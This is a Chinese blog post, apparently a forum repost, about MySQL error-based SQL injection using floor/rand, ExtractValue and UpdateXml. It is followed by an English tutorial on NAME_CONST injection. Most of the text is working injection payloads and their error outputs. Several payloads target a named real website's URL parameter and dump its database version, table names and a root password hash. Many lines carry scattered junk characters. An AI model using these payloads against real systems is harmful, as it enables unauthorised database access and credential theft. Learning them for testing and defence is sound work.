mysql ,floor,ExtractValue,UpdateXml三种报错模式注入利用方法

admin

1、通过floor报错

可以通过如下一些利用代码

and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union   select null union   select  !1)x group by concat((select table_name from information_schema.tables  limit 1),floor(rand(0)*2)));

举例如下：
5 k# G/ t* b" f4 o/ @+ I( u( H, A首先进行正常查询：

mysql> select * from article where id = 1;
+—-+——-+———+
9 y$ N" T0 d9 t" Z) m| id | title | content |
+—-+——-+———+
|  1 | test  | do it   |
. x+ V4 z$ G% g& p1 ]6 a5 S) f9 i+—-+——-+———+

假如id输入存在注入的话，可以通过如下语句进行报错。

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat(version(),floor(rand(0)*2))x from  information_schema.tables group by x)a);
; m2 h# n6 `% Q4 K$ A2 dERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’

可以看到成功爆出了Mysql的版本，如果需要查询其他数据，可以通过修改version()所在位置语句进行查询。
0 @4 t3 z: x) D' l. c例如我们需要查询管理员用户名和密码：

Method1:

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat((select pass from admin where id  =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
8 |/ B7 t, F$ N0 b- F) Z1 FERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’

Method2:

mysql> select * from article where id = 1 and (select count(*)  from (select 1 union   select null union   select !1)x group by  concat((select pass from admin limit 1),floor(rand(0)*2)));
: I: y) R2 R$ H6 D8 g( Q! QERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’

2、ExtractValue
测试语句如下

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

实际测试过程

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–
" @& l$ ]/ |; P# N: D' h+ fERROR 1105 (HY000): XPATH syntax error: ’\admin888′

3、UpdateXml

测试语句

and 1=(updatexml(1,concat(0x3a,(select user())),1))

实际测试过程

mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’

9 j; r* K8 d- x; f' w

再收集：

8 H* U3 E3 w/ c5 o4 [1 g/ Xhttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

* E  X5 q4 l( M" E* \9 jErroruplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’
. b5 j" ~2 F$ t3 y& t6 K2 V
& a* A6 {" X. \7 |& [$ e- H+ \http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)
% D; ~4 B. J! }$ C% V( S' J  u
Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′

. y' [' z0 z! o* ^  s- o  rMYSQL高版本报错注入技巧-利用NAME_CONST注入
It's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.

% ?) g5 i% i, M9 m) U' {: M
相关信息

9 ^. a) U% a& S5 o( B$ zNAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.

Code:
7 w: i: r0 U  |+ y6 uNAME_CONST(DATA, VALUE)
% d, ^5 h& i8 o& H
Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.

- ~1 O2 P( c; [/ k6 w( NSELECT NAME_CONST('TEST', 1)

9 f' [4 ^4 [, ]

; ~& U7 L) B! _% U' X" `|---------------|
|     TEST      |
|               |
|---------------|
6 G6 G) T. ]' h2 p3 }|       1       |
* t  C: Q" m) M- N|               |
|---------------|

2 i3 e8 t: u0 C: _8 j9 z0 f) y
  m  r( h5 c9 x; `) k& F

http://dev.mysql.com/doc/refman/5.0/en/m...name-const
8 W# E2 `' w- \Intro to MySQL Variables
' j) ]$ F& |, E
Once you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.

Code:
' z9 `$ Y* {6 f+ b2 f" \. k$ khttp://www.baido.hk/qcwh/content ... ;sid=19&cid=261

; W7 K( z/ U8 W/ ~& _& M
& o9 J% d' Q2 H- @" k
, G4 f5 }  K7 L( M2 Q
( c: _, G- E( _. ^7 v! u
# I6 q: `/ W* b$ P& \( }/ q- `Code:
) a. I$ ]: J8 W& H6 Gand+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--

& @3 y; s& Q- Z# I) B5 b  q
9 E9 a) q) v- M- j8 y' tVAR = Your MySQL variable.
6 [2 _; {' x! A% T
% r9 x; X' s. k% wMySQL 5.1.3 Server System Variables
7 S3 U. e. o- h) ?1 m4 {
- v# N& J. Y. [Let's try it out on my site..
$ p% b$ r" M) R6 E; u
Code:
6 p" b2 ?' V. dhttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

Erroruplicate column name '5.0.27-community-nt'
& U, C  Y2 _9 s: S- }
4 N, A4 n- ?  ?7 h! K
. Q( h3 t5 w, J* i7 C" ?
9 Q8 v* a  U7 S0 \2 [
- l: }. j9 O6 M4 a5 e7 f( y
, m- F* }" v( c5 ], fNow I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...

Data Extraction

" e6 L" T; Z' WCode:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--


% n$ O) s4 a( P; n9 {1 {( pWe should get a duplicate column 1 error...
8 c4 h4 U3 L# _
0 W1 e" }  w/ B& FCode:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--
. G& |* U6 s* W2 j  E* C
Erroruplicate column name '1

5 l1 k& [6 H" k3 l. C

# l4 o! H  d6 R& Y6 h) e* ?

' ^4 U2 e: c4 k: O# y! _- n$ D
8 t; F  P) h+ H5 TNow let's get the tables out this bitch..

- O- m8 {" ^7 aCode:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--


0 d9 x) j* _+ T) I$ B+ pLet's see if it works here, if it does, we can go on and finish the job.
  i4 B$ O0 R- M; N( u
Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--


Erroruplicate column name 'com_admanage

' E& _  X# Q0 r5 C



8 X2 H9 c, t) C) S: j+ K# |! x
. V. t8 H- W0 F* n9 d0 K1 i) Z4 @Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.
$ Y- g: n% u/ b! t& ]$ N$ ]) g1 T
+ g- l( Z2 N: Y! Y# ELet's get the columns out of the user table..
8 L7 \- e9 x5 Q2 n3 k. \' l
Code:
9 E' T: C$ E2 [! S  f+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--


So mine looks like this, and I get the duplicate column name 'Host'.
& R6 {" ]4 S* E9 D( ]. _3 R
4 S' ^" E' j- lCode:
0 u9 a2 e" w4 |http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--
2 C9 B- {  b, h. ?4 s, y/ x; F
+ M* @/ q& T0 t# f" SErroruplicate column name 'Host'


. a, z% T- c, {1 \2 c



9 v) h) \, l- n7 _0 Z: f% y4 D+ @8 nWoot, time to finish this bitch off.
; o1 N: S- C4 @5 [2 ^! z
, N. M5 N: B' f, n0 y- RCode:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--

& V& H1 _' o+ m7 p  Y/ Z
3 i, _- K! D$ e. GSo mine looks like this...
: |4 Y, w$ `% E/ Z! V* U" A
5 ~& y% T# o: f7 xCode:
http://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

Erroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
& [( C. v9 T7 M) l4 q  i7 P9 ]

+ J  o/ j5 s! e' S

4 Q7 C4 S0 h  H5 R% s+ S$ b

And there we have it, thanks for reading.

, m) }# {/ ^) C( s4 c4 B4 z